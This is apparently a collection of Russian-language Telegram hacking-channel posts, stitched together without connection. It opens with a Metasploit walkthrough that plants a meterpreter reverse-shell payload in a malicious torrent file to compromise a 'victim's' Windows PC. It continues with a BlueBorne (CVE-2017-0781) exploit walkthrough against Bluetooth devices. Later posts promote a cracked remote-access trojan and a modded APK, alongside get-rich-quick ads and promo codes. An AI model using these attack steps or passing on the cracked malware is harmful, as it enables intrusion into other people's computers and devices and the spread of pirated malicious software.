​Взламываем Windows с помощью torrent-файла

Многие наши читатели когда-либо сталкивались с torrent-файлами, но не многие понимают, какую опасность представляют подобные файлы. Именно поэтому сегодня мы разберемся, как взломать Windows с помощью torrent-файла.

Обновляем пакеты Kali Linux:
apt update && apt upgrade

Открываем предустановленный Metasploit:
msfconsole

Задействуем эксплоит:
use exploit/windows/browser/webdav_dll_hijacker

Далее выбирает тип полезной нагрузки:
set payload windows/meterpreter/reverse_tcp

Устанавливаем ip-адрес атакующего хоста:
set lhost <ip-адрес>

Выбираем тип расширения для вредоносного файла:
set extensions torrent

И запускаем работу инструмента:
exploit

Инструмент запустит веб-сервис с нашим вредоносным файлом, доступ к которому можно получить по ссылке. Нам осталось только заставить нашу жертву перейти по нашей ссылке, установить torrent-файл и запустить.

Бонус для подписчиков. VK Combo за 0 рублей на один месяц по промокоду GET127985

@ShadowCasher

➣​​​​​​​​​​​​​​​​​​​​​​​​​​Отключаем Bluetooth Колонки

Экспоит будет искать уязвимости в прошивке.

Установка:
apt install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install —upgrade pip
pip install —upgrade pwntools
apt-get install bluetooth libbluetooth-dev
pip install pybluez
Клонируем инструмент:
git clone https://github.com/ojasookert/CVE-2017-0781.git
Если не будет работать Bluetooth, то для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
btmgmt —index 0
power
auto-power
find
>Используем скрипт.Для этого нам нужен MAC-адрес bluetooth устройства:
btmgmt —index 0
find
Как только будет найдена жертва:
python CVE-2017-0781.py TARGET= (МАC адрес большими буквами)

​​Kernel Fuzzer — межплатформенный фреймворк

В течение некоторого времени существовало несколько наборов инструментов, которые предлагали методы выявления уязвимостей в ядрах, в частности ядра POSIX. Тем не менее, ни один из них не определил метод для общего фаззинга в ядрах Windows и POSIX и не был обновлен в течение некоторого времени. Это основное ядро Kernel Fuzzer с примерами вызовов библиотеки и Syscalls для запуска фаззинга Windows.

Читать: https://codeby.net/threads/kernel-fuzzer-mezhplatformennyj-frejmvork.65581/

#kernel #scaner #framework

#софт

SoloLearn

SoloLearn - приложение, которое систематизирует процесс обучения какого либо языка программирования. Отлично подходит новичкам и тем, кто хочет просто закрепить свой уровень знаний. Имеются встроенные интерпретаторы, тесты, а по окончанию обучения выдается красивый сертификат. Нет никаких платных услуг, монетизируется исключительно редкой рекламой.

💾 Скачать

Про мошенников и кидал

Наткнулся тут на сериал по совету админов про известных скамеров. Очень крутая подача и максимально подробно разобраны ситуации с потерпевшими. Там и про Штору (Артём Маслов), и про БМ, и про Кэшбери, и про NL.

Сериал называется Авантюристы и состоит из 7 серий. Доступен он на КиноПоиск HD, поэтому, если захотите посмотреть, юзайте промокод BVWGY5LLZE и получите подписку абсолютно бесплатно, заодно узнаете на какие суммы кидал Штора.

#infowars

‼️Blokada VPN MOD v5.8.0‼️
💫 Обновление
💡 Легкое и компактное приложение, которое блокирует всю рекламу, вредоносное программное обеспечение и другие назойливые элементы, и вам не придется ни о чем беспокоиться. Приложение поможет вам защитить свою конфиденциальность, одновременно с этим повышая скорость навигации, не давая вашему мобильному устройству скачивать ненужное содержимое.
⚙️
Пользоваться просто, необходимо нажать только одну кнопку и подтвердить, когда появится соответствующее окно с запросом разрешений. Когда приложение будет активировано, в левом нижнем углу вы увидите счетчик, на котором указывается количество всех заблокированных элементов.

Blokada работает автоматически со всеми установленными на вашем мобильном устройстве приложениями, а не только в браузере. И ему не требуется root-доступ. Его нужно только открыть, активировать и забыть о нем, поскольку оно будет работать в фоновом режиме, блокируя все, что вам неинтересно.
Official link
🔑 MOD
#Безопасность @FreeApkexe

Blokada VPN MOD v5.8.0
#Безопасность @FreeApkexe

#скрипт #лайфхак

Временный номер в терминале

Если вы нуждаетесь в конфиденциальности и не хотите использовать личный номер в сторонних сервисах, то для вас существует полезный инструмент, который называется «Tmpsms». Это утилита командной строки, написанная на POSIX, которая позволит вам получать временные номера телефона и принимать на него SMS-сообщения.

Установка:

curl -L "https://git.io/tmpsms" > tmpsms && chmod +x tmpsms

mv tmpsms ~/bin/

Использование:

Инициализировать новый номер телефона:

$ tmpsms init

Просмотреть 5 последних сообщений:

$ tmpsms --count 5

🔑 Делаем с нуля 1500-3000 рублей в день, полностью без вложений

EDS Lite - аналог всем известного инструмента для шифрования данных VeraCrypt, на Android и IOS. Обладает точно такими же функциями, позволяет зашифровывать и расшифровывать файл-контейнеры любыми видами шифрования и алгоритмами. Имеет возможность открытия одновременно нескольких контейнеров и оперативной их зашифровке.

🔑 Делаем с нуля 1500-3000 рублей в день, полностью без вложенийм

Mirai Eye Rat Cracked

Очень хороший ратник, которая работает на нескольких ОС, таких как windows, linux, iot, debian, android, fedora, mac и osr.

Функционал ратника

#софт

Briar

Briar - на данный момент самый безопасный децентрализованный сервис, который работает через Tor-сеть, чем значительно повышает анонимность конечного получателя сообщений. База сообщений хранится исключительно на вашем устройстве и в случае утери пароля вы навсегда их теряете. Также как и в Telegram, имеются каналы и чаты, но в более упрощенном виде. Имеет ряд багов, которые на данный момент решают разработчики.

💾 Скачать